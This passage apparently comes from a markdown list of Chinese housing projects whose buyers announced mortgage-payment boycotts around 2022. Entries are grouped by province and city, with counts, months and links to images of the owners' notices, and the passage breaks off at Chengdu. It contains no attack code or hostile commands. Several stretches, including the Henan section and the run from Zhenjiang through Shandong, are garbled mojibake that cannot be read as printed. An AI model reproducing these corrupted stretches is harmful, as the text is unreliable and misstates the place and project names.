**่ฅ้˜ณๅธ‚๏ผˆ1๏ผ‰๏ผš** ๅฑ…ๆ˜“่ฅฟ้ƒก - **่ฎธๆ˜Œๅธ‚๏ผˆ2๏ผ‰๏ผš** ้‡‘็ง‘้นฟ้ธฃๅธๆ™ฏ, ่žๅˆ›่ง‚ๆฒณๅฎธ้™ข - **้ƒ‘ๅทžๅธ‚๏ผˆ45๏ผ‰๏ผš** ๅฅฅๅ›ญ่ช‰ๆน–ๆนพ, ๅฅฅๅ›ญๆ‚ฆๅŸŽ๏ผˆๆฑ‡ๆ™ฏๅ›ญ๏ผ‰, [็€šๆตท่ˆชๅŸŽ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/็€šๆตท่ˆชๅŸŽๅ‘Š็Ÿฅไนฆ.png), ็€šๆตทๆ€ๅฟตๅŸŽ, ๆตฉๅˆ›ๆขงๆก่Œ—็ญ‘๏ผˆ7ๆœˆ๏ผ‰, ๆ’ๅคงๅŸŽ, ๆ’ๅคงๅ…ป็”Ÿ่ฐท, ๅŽ็บณ้พ™็†™ๆนพ, [้‡‘ๆฐดๅŒบๅบทๆกฅไธœ้บ“ๅ›ญไบŒๆœŸ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๅธ‚้‡‘ๆฐดๅŒบๅบทๆกฅไธœ้บ“ๅ›ญไบŒๆœŸๅ…จไฝ“ไธšไธปไบŽ2022ๅนด10ๆœˆ1ๆ—ฅๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), ้”ฆ่‰บ่ฝป็บบๅ››ๆœŸๆœชๆฅๅ…ฌๅฏ“, 
[ไน่ฃ•้พ™ๅŸŽ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/ไน่ฃ•้พ™ๅŸŽ.jpeg), ๅบทๆกฅ็Ž–็Žบๅ›ญ, [ๅบทๆกฅ้‚ฃไบ‘ๆบช๏ผˆ8ๆœˆ)](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/ๆ–ฐ้ƒ‘้พ™ๆน–ๅบทๆกฅ้‚ฃไบ‘ๆบช.jpg), ๅบทๆกฅๆœชๆฅๅ…ฌๅ…ƒ, ๅบทๆกฅ้ฆ™ๆบช้ƒก, [ๅบทๆกฅๆ‚ฆๆบชๅ›ญ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๅบทๆกฅๆ‚ฆๆบชๅ›ญ.png), ๅบทๆกฅ้˜…ๆบช้›…่‹‘, [ๅญ”้›€ๅŸŽๅ…ฌๅ›ญๆตท](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๅญ”้›€ๅŸŽๅ…ฌๅ›ญๆตท.png), [่“ๅฎๆกƒๆบ้‡Œ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/่“ๅฎๆกƒๆบ้‡Œๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), ้พ™ๆน–้”ฆ่‰บๅŸŽ้ซ˜ๅ…ญ, ้พ™ๆน–ไธ€ๅท๏ผˆ9ๆœˆ๏ผ‰, ็ปฟๅœฐๆปจๆน–ๅ›ฝ้™…ๅŸŽ, ็ปฟๅœฐๅŸŽไบŒๅŒบ๏ผˆ7ๆœˆ๏ผ‰, [็ปฟๅœฐๅŸŽไบ”ๆœŸๅ…ญๅŒบ๏ผˆ7ๆœˆ๏ผ‰](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทž็ปฟๅœฐๅŸŽไบ”ๆœŸๅ…ญๅŒบๅœ่ดทๅฃฐๆ˜Ž.jpg), ็ปฟๅœฐๆบฑๆฐดๅฐ้•‡, ๅ้—จ็ฟ ๅ›ญ, ๅ้—จๅคฉๅขƒ, ๅ้—จ็ดซๅ›ญ, ๅ•Ÿ็ฆๅŸŽ, ๆธ…ๅŽๅŸŽ๏ผˆ7ๆœˆ๏ผ‰, [่žๅˆ›ไธญๅŽŸๅคง่ง‚ไบŒๆœŸ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๅธ‚่žๅˆ›ไธญๅŽŸๅคง่ง‚ไบŒๆœŸๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), ็››ๆถฆๅŸŽๅฃนๅทๅ…ฌ้ฆ†, [็››ไธ–ๅง้พ™ๅŸŽไธ‰ๆœŸ๏ผˆ10ๆœˆ๏ผ‰](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๅธ‚ไธญๅŽŸๅŒบ็››ไธ–ๅง้พ™ๅŸŽไธ‰ๆœŸ.jpg), [ๆณฐๅฑฑ่ช‰ๆ™ฏๆœ—่ช‰ๅ›ญ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/ๆณฐๅฑฑ่ช‰ๆ™ฏๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด9ๆœˆๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), [ๅจ้พ™ๅฐšๅ“13ๅทๆฅผ๏ผˆ10ๆœˆๅบ•ไธ‰ๆœŸ็ƒ‚ๅฐพไธ‰ๅนดๅœ่ดท๏ผ‰](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๆ–ฐ้ƒ‘ๅจ้พ™ๅฐšๅ“13ๅทๆฅผๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), [ๆ–ฐ้ƒ‘ๅธ‚ๆตฉๅˆ›ๅŸŽ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/ๆตฉๅˆ›ๅŸŽๅ‘Š็Ÿฅไนฆ.png), [้‘ซ่‹‘้‡‘ๆฐด่ง‚ๅŸŽ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๅธ‚้‘ซ่‹‘้‡‘ๆฐด่ง‚ๅŸŽ.jpg), [้‘ซ่‹‘ๅๅŸŽ3ๅท้™ขไฝๅฎ…](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทž้‘ซ่‹‘ๅๅŸŽ3ๅท้™ขไฝๅฎ…้กน็›ฎ.png), ๆฐธๆ’็†ๆƒณไธ–็•Œไธ‰ๆœŸ๏ผˆ9ๆœˆ๏ผ‰, [่ฑซๅ‘็™ฝ้นญๆบๆ˜ฅๆ™“ไธ‰ๆœŸ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทž่ˆช็ฉบๆธฏๅŒบ่ฑซๅ‘็™ฝ้นญๆบๆ˜ฅๆ™“ไธ‰ๆœŸๅ…จไฝ“ไธšไธปๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpg), [ๆญฃๅ•†็Ž–ๅท้™ข](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/_ๆ–ฐ้ƒ‘ๅธ‚ๆญฃๅ•†๏ผˆ้พ™ๆน–๏ผ‰็Ž–ๅท้™ข), ้ƒ‘่ฅฟ้‘ซ่‹‘ๅๅฎถๅ››ๆœŸ๏ผˆ7ๆœˆ๏ผ‰, [้ƒ‘ๅทž่žๅˆ›ๅพกๆน–ๅฎธ้™ขไธ‰ๆœŸ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทž่žๅˆ›ๅพกๆน–ๅฎธ้™ขไธ‰ๆœŸ.png), [้ƒ‘ๅทžๆ–ฐ็”ฐๅŸŽๆน–ๅ…‰้‡ŒไบŒๆœŸ(ๅŽŸๆดžๆž—ๆ–‡่‹‘)](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๆ–ฐ็”ฐๅŸŽๆน–ๅ…‰้‡ŒไบŒๆœŸ๏ผˆๅŽŸๆดžๆž—ๆ–‡่‹‘๏ผ‰.jpg), [้ƒ‘ๅทž้‘ซ่‹‘ๅ›ฝ้™…ๆ–ฐๅŸŽ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทž้‘ซ่‹‘ๅ›ฝ้™…ๆ–ฐๅŸŽ.jpg) - **ๅ‘จๅฃๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆงๅบœๅ…ญๅทไธ‰ๆœŸ - **้ฉป้ฉฌๅบ—ๅธ‚๏ผˆ5๏ผ‰๏ผš** [ๆ’ๅคงๆ‚ฆๅบœ](images/ๆฒณๅ—็œ/้ฉป้ฉฌๅบ—ๅธ‚/้ฉป้ฉฌๅบ—ๆ’ๅคงๆ‚ฆๅบœ.png), ไฝณๅ’Œๆ–ฐๅŸŽ, ๅนณ่ˆ†ๅŽฟๆน–็€่“ๅฒธ๏ผˆ10ๆœˆ๏ผ‰, ้‚ๅนณๅŽฟ็ปฟๅœฐ่‹‘, ไธญๅŽŸๅŸŽ ### ๆน–ๅŒ—็œ [ 25 ] - **้„‚ๅทžๅธ‚๏ผˆ3๏ผ‰๏ผš** ้„‚ๅทžๅธ‚่Šฑๆ ทๅนด้ฆ™้—จ็ฌฌ, ๆ’ๅคง็ซฅไธ–็•Œๅ››ๅทๅœฐ๏ผˆๅปŠๆกฅๆฐดไนก๏ผ‰๏ผˆ9ๆœˆ๏ผ‰, ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ - **่†้—จๅธ‚๏ผˆ1๏ผ‰๏ผš** ๅฎžๅœฐ็ดซ่–‡้›…่‘— - **้šๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคงๆ‚ฆ้พ™ๅฐ๏ผˆ10ๆœˆ๏ผ‰ - **ๆญฆๆฑ‰ๅธ‚๏ผˆ14๏ผ‰๏ผš** [ๅฅฅๅฑฑๆฑ‰ๅฃๆพŽๆนƒๅŸŽ](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ๆญฆๆฑ‰ไธœ่ฅฟๆน–ๅฅฅๅฑฑๆฑ‰ๅฃๆพŽๆนƒๅŸŽ.jpg), ๅฅฅๅฑฑ็ปๅผ€ๆพŽๆนƒๅŸŽ๏ผˆ7ๆœˆ๏ผ‰, [ๅฅฅๅฑฑ้ฆ–ๅบœ](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ๅฅฅๅฑฑ้ฆ–ๅบœ๏ผˆๅฅฅๅฑฑ้ƒก๏ผ‰.png), [ๅฝ“ไปฃ้“ญๅฑฑ็ญ‘(ไบบ็ฆๅ›ฝ้™…ๅฅๅบทๅŸŽ)๏ผˆ7ๆœˆ๏ผ‰](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ไบบ็ฆๅ›ฝ้™…ๅฅๅบทๅŸŽ.png), [ๅ…‰่ฐท็ปฟๅœฐไธญๅฟƒๅŸŽJKLๅœฐๅ—](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ๅ…‰่ฐท็ปฟๅœฐไธญๅฟƒๅŸŽJKLๅœฐๅ—.png), [ๆฑ‰ๅ—็ปฟๅœฐๅŸŽไบŒๆœŸ](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ๆฑ‰ๅ—็ปฟๅœฐๅŸŽไบŒๆœŸ.png), [ๆ’ๅคง็ง‘ๆŠ€ๅŸŽ๏ผˆ8ๆœˆ๏ผ‰](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ๆ’ๅคง็ง‘ๆŠ€ๆ—…ๆธธๅŸŽ.png), [ๆ’ๅคง้พ™ๅŸŽๅ››ๆœŸ](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ๆ’ๅคง้พ™ๅŸŽๅ››ๆœŸ.png), [ๆ’ๅคงๆ—ถไปฃๆ–ฐๅŸŽ๏ผˆ8ๆœˆ๏ผ‰](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ๆ’ๅคงๆ—ถไปฃๆ–ฐๅŸŽ.png), [็ปฟๅœฐๅ…‰่ฐทๆ˜Ÿๆฒณ็ป˜](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/็ปฟๅœฐๅ…‰่ฐทๆ˜Ÿๆฒณ็ป˜.jpg), ็ปฟๅœฐๅ…‰่ฐทไธญๅฟƒๅŸŽ, 
[美好香域花境](images/湖北省/武汉市/美好香域花境.jpg), 泰禾知音湖院子（君悦花园）, 新洲中新盛景
- **咸宁市（3）：** 恒大名都, 联乐广场, 绿地城际空间站
- **襄阳市（2）：** 恒大翡翠龙庭一期（8月）, 蓝光雍锦园
- **孝感市（1）：** 润达·壹号广场

### 湖南省 [ 34 ]
- **常德市（1）：** [汉寿县山湖海上城二期、三期](images/湖南省/常德市/常德市汉寿县山湖海上城二期、三期全体业主停贷告知书.jpeg)
- **郴州市（1）：** [郴州鲲鹏商贸城](images/湖南省/郴州市/郴州鲲鹏商贸城强制停贷通知.png)
- **衡东县（1）：** 奥体公馆
- **衡阳市（1）：** 华源北街
- **怀化市（2）：** 恒大帝景, 恒大中央广场（8月）
- **浏阳市（1）：** 恒大华府四期
- **邵阳市（1）：** 恒大华府（9月）
- **湘潭市（4）：** [和达滨江公园](images/湖南省/湘潭市/湘潭市和达滨江花园强制停贷书.jpg), 恒大书香门第15、16栋, [金奥湘江公馆](images/湖南省/湘潭市/湘潭金奥湘江公馆一二期停贷告知函.jpg), 湘台国际花园二期
- **永州市（2）：** [道县东方丽都三期（永州道县）](images/湖南省/永州市/关于道县东方丽都强制停贷告知书.png), 舜德湘江
- **岳阳市（1）：** 恒大未来城二期（8月）
- **长沙市（11）：** 滨江正荣紫阙台, [富力园康商业广场](images/湖南省/长沙市/长沙富力园康商业广场全体业主决定于2022年11月强制停贷告知书.jpeg), 合能枫丹宸悦, 合能湘江公馆, 恒大滨江左岸, 恒大御景天下二期（8月）, 恒大悦湖商业广场（12月）, [恒泰芙蓉悦府](images/湖南省/长沙市/湖南省长沙市恒泰芙蓉悦府全体业主停贷告知书.jpg), [宁乡未来方舟2期&3期](images/湖南省/长沙市/宁乡未来方舟.jpg), 新力铂园（8月）, 长沙文景
- **株洲市（8）：** 北大资源翡翠公园, 诚建檀香山, [东成中心1栋](images/湖南省/株洲市/株洲东成中心1栋全体业主决定于2022年9月强制停贷告知书.jpg), [华晨格林水岸二三期](images/湖南省/株洲市/湖南省株洲市华晨格林水岸二三期.png), [华晨金水湾三四期](images/湖南省/株洲市/湖南株洲.jpg), [华晨神农府](images/湖南省/株洲市/株洲市华晨神农府全体业主强制停货告知书.jpeg), 华晨神农湾, 绿地城际空间站

### 吉林省 [ 1 ]
- **公主岭市（1）：** 恒大花溪谷或水世界

### 江苏省 [ 12 ]
- **常州市（1）：** 三盛璞悦湾
- **连云港市（1）：** [恒泰悦珑府](images/江苏省/连云港市/恒泰悦珑府.png)
- **南京市（1）：** [金陵华夏中心（8月）](images/江苏省/南京市/南京市金陵华夏中心文渊府1、2栋全体业主决定于2022年8月强制停贷告知书.png)
- **南通市（1）：** 阳光城未来悦
- **苏州市（2）：** [泰禾金尊府（8月)](images/江苏省/苏州市/苏州泰禾金尊府.jpg), [阳光城檀苑](images/江苏省/苏州市/苏州阳光城檀苑.jpg)
- **宿迁市（1）：** 恒大悦澜湾
- **泰州市（1）：** 恒大御景半岛
- **无锡市（1）：** [天渝骄园](images/江苏省/无锡市/wuxi_天渝骄园.png)
- **扬州市（1）：** [恒大观澜府](images/江苏省/扬州市/扬州恒大观澜府.jpg)
- **镇江市（2）：** 恒大童世界, 
[ๅฅๅฎนๅธ‚ๅฎๅŽ้•‡ๆณฐ็ฆพ้‡‘ๅฐŠๅบœ](images/ๆฑŸ่‹็œ/้•‡ๆฑŸๅธ‚/้•‡ๆฑŸๅธ‚ๅฅๅฎนๅธ‚ๅฎๅŽ้•‡-ๆณฐ็ฆพ้‡‘ๅฐŠๅบœ.jpg) ### ๆฑŸ่ฅฟ็œ [ 15 ] - **่ตฃๅทžๅธ‚๏ผˆ2๏ผ‰๏ผš** ็ปฟๅœฐๅš่งˆๅŸŽ, [ไบŽ้ƒฝๅŽฟๆ’ๅคงๅพกๆ™ฏๅŒ—ๅŒบ](images/ๆฑŸ่ฅฟ็œ/่ตฃๅทžๅธ‚/่ตฃๅทžๅธ‚ไบŽ้ƒฝๅŽฟๆ’ๅคงๅพกๆ™ฏๅŒ—ๅŒบไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **ๆ™ฏๅพท้•‡ๅธ‚๏ผˆ3๏ผ‰๏ผš** ๆ’ๅคง็ฟก็ฟ ๅŽๅบญ, ๆ’ๅคง็‘ๅบญ, ๆ’ๅคงๆ‚ฆๅบœ - **ๅ—ๆ˜Œๅธ‚๏ผˆ6๏ผ‰๏ผš** ๆ’ๅคง็บๅบญ๏ผˆ8ๆœˆ๏ผ‰, ๆ’ๅคงๆž—ๆบชๅบœ๏ผˆ10ๆœˆ๏ผ‰, ้ธฟๆตทๅŸŽ๏ผˆ10ๆœˆ๏ผ‰, [ไธ–่Œ‚ๆณฐ็ฆพๅ—ๆ˜Œ้™ขๅญ](images/ๆฑŸ่ฅฟ็œ/ๅ—ๆ˜Œๅธ‚/_ไธ–่Œ‚ๆณฐ็ฆพๅ—ๆ˜Œ้™ขๅญ), ๆ–ฐๅŠ›ๅŸŽ, ไธญ้‡‘ไธญๅฟƒ - **่ไนกๅธ‚๏ผˆ2๏ผ‰๏ผš** ๆ’ๅคงๅพกๅบœไบŒๆœŸ, ๅบ„ๅ’ŒไธญๅคฎๅŽๅบœ๏ผˆ10ๆœˆ๏ผ‰ - **ๆ–ฐไฝ™ๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคง็ฟก็ฟ ๅŽๅบญ๏ผˆ9ๆœˆ๏ผ‰ - **ๅฎœๆ˜ฅๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคง็ปฟๆดฒๅ››ๆœŸ ### ่พฝๅฎ็œ [ 9 ] - **ๅคง่ฟžๅธ‚๏ผˆ3๏ผ‰๏ผš** [ๅคง่ฟžๅธ‚้‘ซๅˆ›็ง‘ๆŠ€ๅฅๅบทๅฐ้•‡๏ผˆๅŒ…ๆ‹ฌ้‘ซ่‹‘่—้พ™้ฆ–ไป˜ไธ€ๆœŸใ€ไบŒๆœŸ๏ผ‰](images/่พฝๅฎ็œ/ๅคง่ฟžๅธ‚/ๅคง่ฟž้‘ซ่‹‘.jpg), [่žๅˆ›ๆตท้€ธ้•ฟๆดฒ](images/่พฝๅฎ็œ/ๅคง่ฟžๅธ‚/ๅคง่ฟž่žๅˆ›ๆตท้€ธ้•ฟๆดฒ.jpg), ้ฆ™ๆตทๆปจๅŸŽไบŒๆœŸ - **ๆฒˆ้˜ณๅธ‚๏ผˆ6๏ผ‰๏ผš** [ๆ’ๅคง็››ไบฌ็บๅบญ](images/่พฝๅฎ็œ/ๆฒˆ้˜ณๅธ‚/ๆฒˆ้˜ณๆ’ๅคง็››ไบฌ็บๅบญ.png), ๆ’ๅคงๆ—ถไปฃๆ–ฐๅŸŽ, [ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ](images/่พฝๅฎ็œ/ๆฒˆ้˜ณๅธ‚/ๆฒˆ้˜ณๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดงๅ‘Š็Ÿฅไนฆ.jpeg), ๆ’ๅคง่ฅฟๆฑŸๅคฉๆ‚ฆ, [ๆ’ๅคงไธญๅคฎๅนฟๅœบ](images/่พฝๅฎ็œ/ๆฒˆ้˜ณๅธ‚/ๆฒˆ้˜ณๆ’ๅคงไธญๅคฎๅนฟๅœบ.jpg), ้‡‘็ง‘้›†็พŽไธœๆ–น ### ๅ†…่’™ๅค่‡ชๆฒปๅŒบ [ 1 ] - **ๅ‘ผๅ’Œๆตฉ็‰นๅธ‚๏ผˆ1๏ผ‰๏ผš** ้ฆ™ๅข…ๅฒญ่ฅฟๅŒบ๏ผˆ10ๆœˆ๏ผ‰ ### ๅฎๅคๅ›žๆ—่‡ชๆฒปๅŒบ [ 1 ] - **้“ถๅทๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆ’ๅคง็บ็ฟๅบœ](images/ๅฎๅคๅ›žๆ—่‡ชๆฒปๅŒบ/้“ถๅทๅธ‚/้“ถๅทๅธ‚ๆ’ๅคง็บ็ฟๅบœ.png) ### ๅฑฑไธœ็œ [ 14 ] - **ๆตŽๅ—ๅธ‚๏ผˆ2๏ผ‰๏ผš** [่žๅˆ›ไธญๆ–ฐๅ›ฝ้™…ๅŸŽๅ››ๆœŸๅ—ๅŒบ](images/ๅฑฑไธœ็œ/ๆตŽๅ—ๅธ‚/่žๅˆ›ไธญๆ–ฐๅ›ฝ้™…ๅŸŽๅ››ๆœŸๅ—ๅŒบ.jpeg), [้˜ณๅ…‰ๅŸŽๆช€ๆ‚ฆ](images/ๅฑฑไธœ็œ/ๆตŽๅ—ๅธ‚/้˜ณๅ…‰ๅŸŽๆช€ๆ‚ฆ.jpeg) - **้’ๅฒ›ๅธ‚๏ผˆ10๏ผ‰๏ผš** [้ป„ๅฒ›่“ๅ…‰้›้”ฆๅŠๅฒ›๏ผˆ6ๆœˆ)](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/่“ๅ…‰้›้”ฆๅŠๅฒ›.jpeg), [่ƒถๅทžๅไฟกๅคฉ้ช„ไบ‘้บ“](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/่ƒถๅทžๅไฟกๅคฉ้ช„ไบ‘้บ“.jpeg), [ๆŽๆฒงๅŒบ่žๅˆ›ๆ‚ฆๅฑฑไบŒๆœŸ](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/ๆŽๆฒงๅŒบ่žๅˆ›ๆ‚ฆๅฑฑไบŒๆœŸ.jpg), [็ปฟๅœฐๅŸŽ้™…็ฉบ้—ด็ซ™๏ผˆ9ๆœˆ๏ผ‰](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/็ปฟๅœฐๅŸŽ้™…็ฉบ้—ด็ซ™.png), [้’ๅฒ›ๆตทๆด‹ๆดปๅŠ›ๅŒบ่žๅˆ›ไธญๅฟƒไธ‰ๆœŸ๏ผˆ10ๆœˆ๏ผ‰](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/้’ๅฒ›ๆตทๆด‹ๆดปๅŠ›ๅŒบ่žๅˆ›ไธญๅฟƒไธ‰ๆœŸ.png), [ไธ‰็››ๅ›ฝ้™…ๆตทๅฒธไบ”ๆœŸ๏ผˆ9ๆœˆ๏ผ‰](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/ไธ‰็››ๅ›ฝ้™….jpeg), [ๅฎžๅœฐ่”ท่–‡ๅ›ฝ้™…](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/ๅฎžๅœฐ่”ท่–‡ๅ›ฝ้™….jpeg), [่ฅฟๆตทๅฒธๆ–ฐๅŒบ่žๅˆ›ๅฝฑ้ƒฝๅญฆๅบœไธ‰ๆœŸ๏ผˆ9ๆœˆ๏ผ‰](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/้’ๅฒ›่ฅฟๆตทๅฒธๆ–ฐๅŒบ่žๅˆ›ๅฝฑ้ƒฝๅญฆๅบœไธ‰ๆœŸ.jpeg), [่ฅฟๆตทๅฒธๆ–ฐๅŒบไธ–่Œ‚โ€ข้ฆ™ๅฅˆๅ…ฌ้ฆ†๏ผˆ10ๆœˆ๏ผ‰](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/_่ฅฟๆตทๅฒธๆ–ฐๅŒบไธ–่Œ‚โ€ข้ฆ™ๅฅˆๅ…ฌ้ฆ†), [ไธญๅ—ๆž—ๆจพๅฐๅŒบ๏ผˆ7ๆœˆ๏ผ‰](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/ๆŽๆฒงไธญๅ—ๆž—ๆจพ.jpg) - **็ƒŸๅฐๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆพ้šฝ้˜ณๅ…‰ๅŸŽ๏ผˆ12ๆœˆ๏ผ‰](images/ๅฑฑไธœ็œ/็ƒŸๅฐๅธ‚/ๆพ้šฝ้˜ณๅ…‰ๅŸŽ.jpeg) - **ๆท„ๅšๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆ’ๅคงๅ…ป็”Ÿ่ฐท](images/ๅฑฑไธœ็œ/ๆท„ๅšๅธ‚/_ๆท„ๅšๆ’ๅคงๅ…ป็”Ÿ่ฐท) ### ๅฑฑ่ฅฟ็œ [ 11 ] - **ๅคชๅŽŸๅธ‚๏ผˆ11๏ผ‰๏ผš** ๅฎ่ƒฝๅŸŽไธ€ๆœŸ๏ผˆ8ๆœˆ๏ผ‰, [ๆ’ๅคงๆปจๆฒณๅบœไบŒๆœŸ](images/ๅฑฑ่ฅฟ็œ/ๅคชๅŽŸๅธ‚/ๅคชๅŽŸๆ’ๅคงๆปจๆฒณๅบœไบŒๆœŸๅ…จไฝ“ไธšไธปๅ†ณๅฎšๅƒ2022ๅนด9ๆœˆๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), ๆ’ๅคง้‡‘็ขงๅคฉไธ‹ๅ…ซๆœŸ๏ผˆ10ๆœˆ๏ผ‰, ๆ’ๅคง้‡‘็ขงๅคฉไธ‹ไบ”ๆœŸ๏ผˆๅ…ซๆœˆ๏ผ‰, [ๆ’ๅคงๆฃฎๆž—ๆตทไธ€ๆœŸ](images/ๅฑฑ่ฅฟ็œ/ๅคชๅŽŸๅธ‚/ๅคชๅŽŸๆ’ๅคงๆฃฎๆž—ๆตทไธ€ๆœŸๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), [็ปฟๅœฐๆ–ฐ้‡ŒๅŸŽไบŒๆœŸ](images/ๅฑฑ่ฅฟ็œ/ๅคชๅŽŸๅธ‚/ๅคชๅŽŸ็ปฟๅœฐๆ–ฐ้‡Œ็จ‹.jpg), 
[太原富力天禧城3期](images/山西省/太原市/太原市富力天禧城3期.jpg), [太原市恒大御景湾4期](images/山西省/太原市/太原市恒大御景湾4期.jpg), [太原市融创中心](images/山西省/太原市/太原市融创中心.png), 泰禾金尊府, [远洋红星天润一期](images/山西省/太原市/_远洋红星天润一期)

### 陕西省 [ 24 ]
- **西安市（23）：** [当代嘉宝公园悦](images/陕西省/西安市/当代嘉宝公园悦停贷告知书.png), [德杰状元府邸（9月）](images/陕西省/西安市/西安市_德杰状元府邸二期.jpg), [国际港务区绿地国港新里城一期（待停贷）](images/陕西省/西安市/西安国际港务区绿地国港新里城一期业主集体停贷告知书.jpeg), 国际幸福城, 鄠邑区名仕华庭, [锦业6号府邸](images/陕西省/西安市/西安锦业6号府邸停贷通知书.png), 乐华城香榭庄园, [绿地璀璨天城二期](images/陕西省/西安市/西安国际港务区绿地璀璨天城B地块业主集体停贷告知书.jpeg), [绿地新里程三期兰亭公馆](images/陕西省/西安市/西安绿地兰亭公馆全体业主强制停贷告知书.png), [融创东方宸院DK5](images/陕西省/西安市/西安市新城区融创东方宸院DK5停贷告知书.jpeg), [世茂璀璨倾城二期（7月）](images/陕西省/西安市/_世茂璀璨倾城二期), [万和郡](images/陕西省/西安市/西安万和郡停贷告知.png), [西安灞桥区易合坊（相关报道）](https://new.qq.com/omn/20220322/20220322A02T2500.html), [西安当代境MOMA](images/陕西省/西安市/西安当代境MOMA项目预停贷告知书.png), [西安沣东新城君合天玺](images/陕西省/西安市/西安沣东新城君合天玺.jpeg), [西安恒大文化旅游城（8月）](images/陕西省/西安市/西安恒大文化旅游城强制停贷告知书.jpeg), [西安康桥悦蓉园（9）](images/陕西省/西安市/西安康桥悦蓉园13号楼停贷告知函.png), [西安名京院望](images/陕西省/西安市/西安名京院望停贷告知书.jpg), 西安铭鸿中心二期, [西安远洋合能枫丹唐悦二期（待停贷）](images/陕西省/西安市/西安远洋合能枫丹唐悦二期强制停贷告知书.jpeg), 阳光100阿尔勒（8月）, [正荣紫阙峯著（紫阙台东西区）](images/陕西省/西安市/西安正荣紫阙峯著全体业主强制停贷告知书.png), [中南上悦城四期](images/陕西省/西安市/西安市西咸新区中南上悦城四期停贷告知书.png)
- **延安市（1）：** [延安融创宸院](images/陕西省/延安市/_延安融创宸院)

### 上海市 [ 7 ]
- **崇明区（1）：** [崇明长兴岛泰禾大城小院](images/上海市/崇明区/泰禾大城小院.png)
- **奉贤区（1）：** [上海市奉贤区泰禾海上院子](images/上海市/奉贤区/上海市奉贤区泰禾海上院子.jpg)
- **嘉定区（2）：** [嘉定南翔绿茵城市广场](images/上海市/嘉定区/嘉定绿茵城市广场.png), [徐行佳兆业五期](images/上海市/嘉定区/上海徐行佳兆业五期.jpeg)
- **浦东新区（3）：** [临港万祥颐景园江南院](images/上海市/浦东新区/上海临港万祥颐景园江南院.jpeg), [上海浦东新区君御公馆](images/上海市/浦东新区/上海浦东新区君御公馆停贷通知书.png), [周浦合富广场](images/上海市/浦东新区/合富广场停贷通知.png)

### 四川省 [ 18 ]
- **巴中市（1）：** 恩阳川旅世纪外滩
- **成都市（9）：** 
